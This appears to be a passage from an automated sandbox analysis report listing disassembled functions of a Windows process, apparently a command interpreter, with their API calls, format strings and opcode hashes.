                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                        • String ID: @P
                                        • API String ID: 1801357106-3670739982
                                        • Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                        • Instruction ID: 2255875a7953c575c309c3d16ae7e66d45e9b320ef3a6256290a307af2bbfb31
                                        • Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                        • Instruction Fuzzy Hash: BF416D32B08A41DAE710AF65D4442EDBBA1FB99768F858231DF2D43A88EF78D604C750
                                        Function 00007FF7CD482220 Relevance: 15.4, APIs: 10, Instructions: 368COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$BufferConsoleInfoScreen
                                        • String ID:
                                        • API String ID: 1034426908-0
                                        • Opcode ID: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                        • Instruction ID: ab4046b07d295918f6f0631b6a6f7e8c16e93d6b0522bb4766014d40d45811ed
                                        • Opcode Fuzzy Hash: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                        • Instruction Fuzzy Hash: E9F1A532B0C68289EB64EF21D8902E9B7A5FF457A8F844135DF6D87695EF38E604C710
                                        Function 00007FF7CD4AAC4C Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 194registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CloseValue$CreateDeleteOpen
                                        • String ID: %s=%s$\Shell\Open\Command
                                        • API String ID: 4081037667-3301834661
                                        • Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                        • Instruction ID: f97a4c73e44ffb86c01bac49265f27a37f42783ecd4d81333d35d557c49e90be
                                        • Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                        • Instruction Fuzzy Hash: A571A321B0DB8292FA10AF55A4952BAE2A1FF857A4FC44131DF6E07784EF3CDA458720
                                        Function 00007FF7CD4AAA30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 123registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7CD4AAA85
                                        • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7CD4AAACF
                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7CD4AAAEC
                                        • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7CD4A98C0), ref: 00007FF7CD4AAB39
                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7CD4A98C0), ref: 00007FF7CD4AAB6F
                                        • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7CD4A98C0), ref: 00007FF7CD4AABA4
                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7CD4A98C0), ref: 00007FF7CD4AABCB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CloseDeleteValue$CreateOpen
                                        • String ID: %s=%s
                                        • API String ID: 1019019434-1087296587
                                        • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                        • Instruction ID: f007e954e358e46a7d53308fe7ab0e7ccf58a36e443dc75a377490044dfa2c28
                                        • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                        • Instruction Fuzzy Hash: 31519431B0CB4296E760AF65E44576AF6A2FB897A0F808235CF6D83791EF38D5418710
                                        Function 00007FF7CD481884 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 380COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsnicmpwcsrchr
                                        • String ID: COPYCMD
                                        • API String ID: 2429825313-3727491224
                                        • Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                        • Instruction ID: 5da91edd810be3f8390a10c685f2409b81c1bb34a0dbd40f157d9eb949bae936
                                        • Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                        • Instruction Fuzzy Hash: D6F19F32F0C652C6FB60AF51D4401BDB6A5AB547A8F804236CF6E636D8FE3CA641C760
                                        Function 00007FF7CD484A30 Relevance: 10.8, APIs: 7, Instructions: 318COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$FullNamePathwcsrchr
                                        • String ID:
                                        • API String ID: 4289998964-0
                                        • Opcode ID: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                        • Instruction ID: 885a15515db1fc1cf5403e128357c2e0dcc0e3501cf21938d8f32ac7cc322c9e
                                        • Opcode Fuzzy Hash: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                        • Instruction Fuzzy Hash: A7C1E511B0E35682EE94BF52958837AA3A1FB54BA0F846534CF2E477D0FF3CA6519320
                                        Function 00007FF7CD4ABCF0 Relevance: 10.6, APIs: 7, Instructions: 52filenativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                        • String ID:
                                        • API String ID: 3476366620-0
                                        • Opcode ID: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                        • Instruction ID: fd60c76b9ba8337292053a8195d0fcaf6608b28d666ec45c014a8af0b471e5d5
                                        • Opcode Fuzzy Hash: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                        • Instruction Fuzzy Hash: ED210E20B0DA4296FA547F51A8192B8EB61FF99735FC45275CF3E422E1FF3CA6048620
                                        Function 00007FF7CD483D94 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                                        • String ID: %9d
                                        • API String ID: 1006866328-2241623522
                                        • Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                        • Instruction ID: c0406630178e919f5c39a740f1ad641f226606c91caf06dc7eb2e2a530c9b8e5
                                        • Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                        • Instruction Fuzzy Hash: FA515C72B0C6429AE700AF51E8545A8BBA4FB847B4F804635DF3D537A5EF3DA600CB60
                                        Function 00007FF7CD488DF8 Relevance: 7.8, APIs: 5, Instructions: 281COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID:
                                        • API String ID: 2221118986-0
                                        • Opcode ID: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
                                        • Instruction ID: 2aa5faddacd4816f65139f6c6aa3473d32ff80dd0db8fa7b5795c93072145af3
                                        • Opcode Fuzzy Hash: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
                                        • Instruction Fuzzy Hash: 45C1D622B0DB8286EB60EF11E850AB9A7A5FB957A4F844135DF2D87794EF3CD641C310
                                        Function 00007FF7CD489B50 Relevance: 7.8, APIs: 5, Instructions: 252COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$AllocProcess
                                        • String ID:
                                        • API String ID: 1617791916-0
                                        • Opcode ID: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                        • Instruction ID: fc4a23ea06fe9a48cf6d7030ce535a36f022d53df10a6502ff3e5659ec4f7d68
                                        • Opcode Fuzzy Hash: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                        • Instruction Fuzzy Hash: 99A1A321B1CA4286EB54BF26A851679A6E5FF847A0FC04135DF6E83791FF3DE6018720
                                        Function 00007FF7CD4AFB54 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$DiskFreeSpace
                                        • String ID: %5lu
                                        • API String ID: 2448137811-2100233843
                                        • Opcode ID: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                        • Instruction ID: 1f6be415052ee40999cd9b5097935c276223a83d1e78d17f60f93005e37f7571
                                        • Opcode Fuzzy Hash: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                        • Instruction Fuzzy Hash: C2418026708AC195EB61EF51E8446EAF361FB84798F848035EE5D0B748EF7CD249C710
                                        Function 00007FF7CD48D250 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsicmp
                                        • String ID: GeToken: (%x) '%s'
                                        • API String ID: 2081463915-1994581435
                                        • Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                        • Instruction ID: 716967c7789859c82151f0da52f2a43000094e8ab4d65bb4dd624694a8f11cbd
                                        • Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                        • Instruction Fuzzy Hash: 5C718E20F0D64385FBA4BF65A858679A6A0AF517B4FC40539DF2D866D0FF3DE6818320
                                        Function 00007FF7CD4881D4 Relevance: 4.8, APIs: 3, Instructions: 299COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcschr
                                        • String ID:
                                        • API String ID: 1497570035-0
                                        • Opcode ID: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                        • Instruction ID: c24db22a44daf8a61e65191ec07c3fab2aa108e38eae248097ed8feb44924731
                                        • Opcode Fuzzy Hash: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                        • Instruction Fuzzy Hash: 66C1E322B1C64282EA54BF16A841679E7A5FF84BA0F844135DF7E83795FF3CE6408720
                                        Function 00007FF7CD4A7B4C Relevance: 4.8, APIs: 3, Instructions: 269fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Find$File$CloseFirstNext
                                        • String ID:
                                        • API String ID: 3541575487-0
                                        • Opcode ID: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                        • Instruction ID: f02c7f471ae96e59e4a448bcc0b6b95a4ce6efb2e0c1498a2a5951645f0592cc
                                        • Opcode Fuzzy Hash: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                        • Instruction Fuzzy Hash: 60A1D161B1C69241EA64BF6694142BAE691AF44BF4FC44235DF7E477C4FE3CEA418320
                                        Function 00007FF7CD486BE0 Relevance: 4.7, APIs: 3, Instructions: 184COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00007FF7CD48CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48B9A1,?,?,?,?,00007FF7CD48D81A), ref: 00007FF7CD48CDA6
                                          • Part of subcall function 00007FF7CD48CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48B9A1,?,?,?,?,00007FF7CD48D81A), ref: 00007FF7CD48CDBD
                                        • _pipe.MSVCRT ref: 00007FF7CD486C1E
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD486CD1
                                        • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7CD486CFB
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heapwcschr$AllocDuplicateHandleProcess_dup_dup2_get_osfhandle_pipe_wcsicmpmemset
                                        • String ID:
                                        • API String ID: 624391571-0
                                        • Opcode ID: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                        • Instruction ID: e5bee907c2bb6143c8eec654be8e54d967f143bde9a6bc1793a9ea8363fca97c
                                        • Opcode Fuzzy Hash: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                        • Instruction Fuzzy Hash: DC715C31B0D6428AE754BF25D84507CF6A1EF887B4B948238DF6D962D5EF3CEA418720
                                        Function 00007FF7CD4A63FC Relevance: 4.7, APIs: 3, Instructions: 179threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
